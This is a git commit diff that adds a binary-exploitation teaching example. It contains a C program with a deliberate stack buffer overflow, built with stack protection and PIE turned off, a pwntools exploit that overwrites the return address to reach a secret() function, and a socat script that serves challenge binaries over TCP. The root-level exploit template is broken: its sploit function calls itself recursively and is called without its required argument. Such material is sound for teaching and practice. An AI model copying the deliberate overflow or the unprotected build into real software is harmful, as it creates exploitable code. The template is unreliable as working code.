add pwn template and first example

5264bf46 · dex · 5264bf46 · 5264bf46 · 5264bf46 · 5264bf46
Commit 5264bf46 authored 6 years ago by dex
--- a/examples/00_pwn/Makefile
+++ b/examples/00_pwn/Makefile
+CC=gcc
+
+main: main.c
+	$(CC) -no-pie -fno-pic -m32 -O0 -fno-stack-protector -o $@ $^
+
+# -no-pie option for linking
+# -fno-pic used for compilation
+
+clean:
+	rm -f main main.o
--- a/examples/00_pwn/main
+++ b/examples/00_pwn/main
--- a/examples/00_pwn/main.c
+++ b/examples/00_pwn/main.c
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+
+void vuln(){
+  char buf[16];
+  ssize_t nread = read(STDIN_FILENO, buf, 256);
+  printf("%i bytes read\n", nread);
+}
+
+void secret(){
+  printf("You won!\n");
+  exit(0);
+}
+
+
+int main(int argc, char** argv){
+  printf("Welcome!\n");
+  printf("Gimme some bytes: ");
+  fflush(stdout);
+  vuln();
+  printf("Thanks. Bye!\n");
+  return 0;
+}
--- a/examples/00_pwn/x.py
+++ b/examples/00_pwn/x.py
+#!/usr/bin/env python
+import sys
+import os
+from pwn import *
+
+### SETUP ###
+
+LOCAL=True
+context.log_level = 'info'
+#context.log_level = 'debug'
+
+### SPLOIT ###
+
+def sploit():
+    log.info(p.recvuntil("\n")) # consume until \n
+    log.info(p.recvuntil(": "))
+    p.sendline((0x1c+0x4) * "A" + p32(elf.sym["secret"]))
+    p.interactive()
+    return
+
+if __name__=="__main__":
+
+    elf = ELF("./main")
+    if LOCAL:
+        p = process("./main")
+        """
+        p = gdb.debug('./main', '''
+                b *0x0804850a
+                c
+                ''')
+        """
+
+        #gdb.attach(p)
+
+        #HOST = "127.0.0.1"
+        #PORT = 1337
+        #p = remote(HOST, PORT)
+    else:
+        HOST = "192.168.1.123"
+        PORT = 4242
+        p = remote(HOST, PORT)
+
+    sploit()
+
+"""
+   0x08048508 <+18>:    push   0x0
+=> 0x0804850a <+20>:    call   0x8048390 <read@plt>
+   0x0804850f <+25>:    add    esp,0x10
+
+pwndbg> x/3wx $esp
+0xffffcf10:     0x00000000      0xffffcf2c      0x00000100
+pwndbg> x/wx $ebp
+0xffffcf48:     0xffffcf58
+pwndbg> p/x 0xffffcf48-0xffffcf2c
+$1 = 0x1c --> buffer base to saved ebp
+"""
--- a/run
+++ b/run
+#!/usr/bin/env bash
+usage() { echo "Usage: ${FUNCNAME[1]} $1" && return 0; }
+
+[[ $# -ne 2 ]] && usage "<levelXX> <port>" && exit 1
+
+socat tcp-l:"$2",fork,reuseaddr EXEC:"stdbuf -o0 ./$1"
+#socat tcp-l:"$2",fork,reuseaddr EXEC:"strace -v ./$1"
+#socat tcp-l:"$2",fork,reuseaddr EXEC:"gdbserver ':1234' ./$1"
+
--- a/x.py
+++ b/x.py
+#!/usr/bin/env python
+import sys
+import os
+from pwn import *
+
+### SETUP ###
+
+LOCAL=True
+context.log_level = 'info'
+#context.log_level = 'debug'
+
+### SPLOIT ###
+
+def sploit(addr):
+
+    log.info(p.recvuntil("\n")) # consume until \n
+    p.sendline(512 * "A" + sploit(0xDEADBEEF))
+    p.interactive()
+
+if __name__=="__main__":
+
+    elf = ELF("./exploitme")
+    if LOCAL:
+        p = process("./exploitme")
+
+        #HOST = "127.0.0.1"
+        #PORT = 1337
+        #p = remote(HOST, PORT)
+    else:
+        HOST = "192.168.1.123"
+        PORT = 4242
+        p = remote(HOST, PORT)
+
+    sploit()